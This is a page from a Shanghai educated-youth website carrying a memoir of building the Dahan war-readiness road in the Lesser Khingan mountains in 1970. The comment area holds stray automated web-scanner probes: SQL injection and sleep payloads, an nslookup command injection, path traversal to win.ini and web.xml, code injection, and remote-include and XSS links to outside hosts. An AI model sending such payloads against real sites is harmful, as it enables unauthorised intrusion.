欢迎您访问上海知青网! 您现在的位置是: 首页 >> 频道首页 >> 往事述说

往事述说

大罕公路轶事
2014/5/22 15:32:41
来源:二道泉老周博客作者:周启准编辑:周路明点击数:681
保护视力色: 杏仁黄 秋叶褐 胭脂红 芥末绿 天蓝 雪青 灰 银河白(默认色)
   
    此文作于2011年6月20日

    作者 周启准  爱辉公社城关大队上海知青 
       
    

    1970年4月4日,告别了生我养我的大上海,绿色的车皮载着我们上海知青一声长鸣,向着千里之外的东北黑龙江进发,经过两天两夜的长途颠簸,火车到了终点—黑龙江北安龙镇车站。四月的东北依然白雪笼罩,寒风嗖嗖,下了火车又坐上长途汽车在丛山峻岭中穿行,时而上山,时而下山,时而穿过平原,到达公社天已黑了,十几辆汽车停在了我们的目的地—爱辉公社,在江边下车,很热闹,很嘈杂。我们在这里集结,换乘各生产队派来的马车去落户的知青点。

    我们的到来据说当时惊动了对岸的苏军,以为中国军队在调动,岗楼上的探照灯照过来都是穿绿军装的,也立马调动军队向江边集结,我们这边的民兵也全副武装的在江边巡逻,以防发生意外,还好后来没发生什么冲突。坐上了生产队派来的马车,半小时后马车终于到了自己的落户点—爱辉公社城关大队二道泉生产队,后来得知二道泉的村名源于村里有二股终年不断流的泉眼。

    在临时的知青宿舍吃上了几天来的第一顿热饭热菜(炒干豆腐),这天晚上我们新来的知青就在当时队上唯一的砖瓦房里稀里糊涂的睡了一晚,第二天起来望着周围一眼望不到边的田野感到一起都很新鲜。

    在生产队呆了十几天,东南西北还没分清楚,队里来了通知要抽调十几位知青去山里修公路,现在叫“农民工”,而我们是当年的“知青工”吧。队里正好有我们这么一批劳力,又是单身汉,无牵挂。就这样队里的土炕还没睡热,就又要出发了。

    
               大罕公路0公里入口处

上山之路
    我们的任务是到小兴安岭修建一条战备公路。那是一条神密的路,它逶迤在大小兴安岭相连的山脊上,云雾是它的面纱,白桦林、柞树林是它的伴侣。这条路叫“大罕公路”,东起黑龙江嫩江县和爱辉县的分水岭—大岭(八里桥),西至爱辉县腹部的罕达汽乡,公路全长120多公里。1970年春天有近千名来自爱辉县各公社的上海知青和带队干部投身到这项战备工程中。

    我在现在的黑龙江地图册上黑河市的那一页,找到了和罕达汽相连的那条淡淡的红线。那是列在高速公路、国道、省道之后的第四等级的县道,现在已经很少有车通过了,就像被遗忘在大山里的一条飘带。
为什么在那个时候在那个地方修这条路呢?珍宝岛打响后,中苏两国关系十分紧张,透过黑龙江边的树林我们看到对岸的坦克和大炮正向江边集结。当时爱辉通往嫩江的那条公路暴露在光天化日之下,都在苏军大炮的射程范围内。为战备需要决定修一条不在射程之内、更隐秘的战备公路。

    出发那天,我们百十号人坐车到新建公路的起点下车,因我们公社分配的路段在起点纵深二十多公里处,须徒步进山。一路上涉过湍急的小溪,因流急大家手拉手,有的女知青竟不敢过,吓得哭了起来。爬山,下山,桦树,杨树在我们的穿越中迅速后退,到了天黑由于没了路标,带路人也迷路了,不能到达宿营地,只能在寒冷冰水的草甸子上坐等一夜,脚浸在冰冷的水中,大家都很害怕,密林深处,时而传来狼的嚎叫和“熊瞎子”的低吼,莫明的恐惧使我们簌簌发抖,时而传来女生轻轻地哭泣声......

    终于熬到天亮了,我们继续前行,一会儿终于看见了前方的炊烟,看见了飘在营房上的红旗,其实宿营地离我们很近。四月的小兴安岭是很冷的,水坑里的水都结了冰,从山顶往下看,到处是筑路的人群,烧水做饭时满山缭绕着炊烟。我想有史以来,小兴安岭大概从来没有这样热闹过,这样充满生机。宿营地是用大大小小的木头垒起来的木屋,屋顶是用油毛毡在木杆上铺成的,床铺是用胳膊粗的白桦树干、树枝铺成的,一溜睡三四十个人。 

    

    


山林生活
    安营扎寨后,第二天我们就开始了漫长的修筑公路的战斗,先把路基上密集的树木锯掉,有的放炮炸掉,然后再把半尺厚的草皮铲掉,男生锯树放炮,女生铲草皮,一天下来精疲力尽。本来就物资短缺,断粮断盐的事经常发生,干着那样沉重的体力劳动却经常吃不饱,小卖部有点好吃的东西也早早卖完。最难的是缺水,大山里干净的水源难找,只能喝经过明矾沉淀的草甸子、塔头甸子下游着小虫的脏水,更谈不上舒舒服服的洗脸、刷牙了,每天早上大家轮流出去找水挑回来用。

    由于山里生活环境恶劣,一半人得了可怕的传染病—痢疾,并且迅速蔓延开来,拉肚子的人很多,拉到后来拉血,平时注意卫生的人还好,平时不注意卫生的人病得很厉害,控制不住。有的男知青连换洗的裤子都没有了,只能光着屁股躲在被窝里,床前浸着满满一盆衣裤无法、也无力清洗(我们队的一个男知青)。在男人聚集干活的地方,有的连裤子都不穿了,简直像原始人一样。还好我不厉害,几天就挺过来了,没有光过腚。因为生病的人太多,我们连队药都吃光了,情况越来越严重,一个屋里起码有十几个人卧床不起,想起来真是触目惊心。

    开路是筑路中最艰难的工程,虽然一棵棵树被锯掉,一块块草皮被铲掉,但对大罕公路来讲,这只是“万里长征走完了第一步”,我们的工作一天比一天艰苦。到了六月,小兴安岭气候变得反复无常,早晨出去明明是万里无云的大晴天,到了中午,没准儿头顶上就来了乌云,还没等你找到藏身之地,大雨便倾盆而下,有时候看到隔壁山在下大雨,一阵阵地压过来,很壮观,一会儿天又放晴了。

    天一晴,烦事也跟着来,东北森林里那厉害的“小咬”(一种小飞虫)全军出动,劈头盖脸,见人就咬,还有比苍蝇大的吸血“牛氓”,男知青还可以脱下衣服包头,女知青可犯难了,尽管头上脸上被咬得满是肿块,只好挥挥树枝搔痒驱赶。东北森林里还有一种比臭虫大一点的黑红色爬虫叫“草爬子”(学名硬蜱),非常厉害,爬到身上没感觉的,等有感觉了,已来不及了,这种爬虫喜欢叮咬男人的软档,头钻进去吸血,不会自己出来的,老乡教我们用香烟头烫它屁股,它才会退出来,不能硬拉,否则头还在肉里,本人被叮过,苦不堪言。因为这种虫只进不退,且会传播“出血热”、“森林脑炎”地方病。

    一次,离我们不远的山脚下着火了。一人多高的火,顺着山风呼呼地滚滚而上,山火过后,树干,杂草变为灰烬,很是恐怖。在没有起码的生活设施,没有基本的施工机械,在荒无人烟的小兴安岭修筑一百多公里的国防公路是件多么难的事啊,经过半年多的艰苦作业,我们已将大罕公路全线贯通了,以后几年里又有不少劳务工在那里挖沟,拉石子铺路面,在莽莽的小兴安岭间有了这样一条通途。
 
    筑路生活虽然艰苦,但有不少惊险、有趣的事情。

    

沼泽背粮 
    筑路初期,公路还未成形不能通车,第一批粮食是指挥部用履带式拖拉机拖着平板爬犁拉进山里的,几百个人吃了个把月后,存货越来越少,等不到指挥部送货来,连队召开动员大会,指导员讲了缺粮的严重性,既影响工程进度,又影响百十号筑路战士的基本生活,各排都纷纷表示可以下山去背,最后连队决定派人下山背粮背菜,每个生产大队要派几个人去,由于我个子大被选中。总共二三十人一早下山,由于下山是空手,一路看风景,一路嘻嘻哈哈,走得倒也蛮快、蛮轻松。路过一片沼泽地时,看到旁边两米外,一辆拖拉机陷进沼泽里,只剩三分之一的车顶露在上面。

    几个小时后来到了二十几公里外的山下筑路指挥部。稍加休息后,大家背着粮食蔬菜开始上山。每人负重四五十斤,我背的是大半袋卷心菜。上山吃力啊!小兴安岭虽然没有南方的山高坡陡,但是背东西上山是真生活啊,不一会儿混身湿透。回来时又经过这片沼泽地,哎呀爹啊,那辆拖拉机只看到顶上的绿漆了,沼泽地把一辆拖拉机吞没了!

    看到眼前的情景大家吓得脚骨发抖,生怕自己也陷下去,小命不保,爷娘白养。大家就商量,小的东西两样并一样。踏着露出湿地脑袋般大小的草塔头,一步步往前走。一个人先背,另一个人前面带路,累了再轮换。我当时和别人合扛一袋,我先带路,另一知青背着一袋菜跟在我后面,出沼泽地应该他换我。那晓得这小子出了沼泽地后人影也没了,再也没来换我。我只能硬着头皮往前挪,半路真想把菜撂了。硬撑着把五、六十斤菜背回宿营地,人累得混身水淋淋,半天没缓过来,差点虚脱。真想找那小子算帐,可后来想想大家都是上海远道而来,算了。

    经过将近五个月的时间,一条初具雏形的战备公路出来了,大家望着用自己辛勤汗水筑成的公路满心喜欢,很有成就感。回到生产队后,我们住进了新盖的知青宿舍,有六人一间的、十人一间的,开始了漫长的插队生活。





发布评论文章评论(0)
共1页,当前为第1页[最前页][上一页][下一页][最后页]  转到
发表我的评论

验证码:
response.write(9261081*9293553) "+response.write(9261081*9293553)+" 浦江情论坛 1 1 1 set|set&set 1 $(nslookup C51QBZ9R) -1 OR 2+935-935-1=0+0+0+1 -- -1 OR 3+935-935-1=0+0+0+1 -- -1 OR 2+105-105-1=0+0+0+1 -1 OR 3+105-105-1=0+0+0+1 -1" OR 2+681-681-1=0+0+0+1 -- 1 1 -1" OR 3+681-681-1=0+0+0+1 -- -1" OR 3*2<(0+5+681-681) -- -1" OR 3*2>(0+5+681-681) -- 6eZbhd0R QgUw1UVA sq2tNVwd ljkHTUla 9eKimXcl 2ongQk03 iYeUbogs 1xMdfV1d 58Wf7bVK 1 1 1 1 1 1 MLKAn5ce 1 1 1 1 1 1 1 1 1 1 1 ../../../../../../../../../../windows/win.ini C:\WINDOWS\system32\drivers\etc\hosts ../../../../../../../../../../windows/win.ini.jpg ................windowswin.ini ..\..\..\..\..\..\..\..\windows\win.ini /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini WEB-INF/web.xml WEB-INF\web.xml ${10000342+9999708} 1 1 1 1 1 1 1 1 1 1 1 1 1some_inexistent_file_with_long_name.jpg 1 Http://testasp.vulnweb.com/t/fit.txt http://testasp.vulnweb.com/t/fit.txt?.jpg testasp.vulnweb.com 1 1 1 1 1 1 1 1 1 1 1&n967080=v926886 1 1 1 ) 1 !(()&&!|*|*| ^(#$!@#$)(()))****** 1 1 1 1 1 -1 OR 2+970-970-1=0+0+0+1 -- -1 OR 2+602-602-1=0+0+0+1 -1" OR 2+847-847-1=0+0+0+1 -- 1 -1)) OR 271=(SELECT 271 FROM PG_SLEEP(15))-- 1????%2527%2522 @@fap9g 1 1 ;print(md5(acunetix_wvs_security_test)); ";print(md5(acunetix_wvs_security_test));$a=" HttP://testasp.vulnweb.com/t/xss.html?%00 testasp.vulnweb.com/t/xss.html?%00 ${@print(md5(acunetix_wvs_security_test))} ${@print(md5(acunetix_wvs_security_test))}\ 1 1 1 1 a_link2.aspx a_link2.aspx a_link2.aspx/. 1 1 1 1 1 1 1 http://hitn4LljR0cu7.bxss.me/ 1 \ 1????%2527%2522 @@eI0Vk 1 JyI= ?'?"" /www.vulnweb.com 1 19634504 1 1 1 1 1 1 1 1 JehQyRxl if(now()=sysdate(),sleep(15),0) 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z 1 1 1 1 1 1 1 1 1 1 1 1 1 1 -5 OR 136=(SELECT 136 FROM PG_SLEEP(15))-- -5) OR 46=(SELECT 46 FROM PG_SLEEP(15))-- 1 1 1 1
主编:黄建华
联系我们 | 网站留言 | 关于我们 | 版权声明 | 管理登录
Copyright 2003 - 2010 版权所有 http://www.shzq.net

沪ICP备060309516号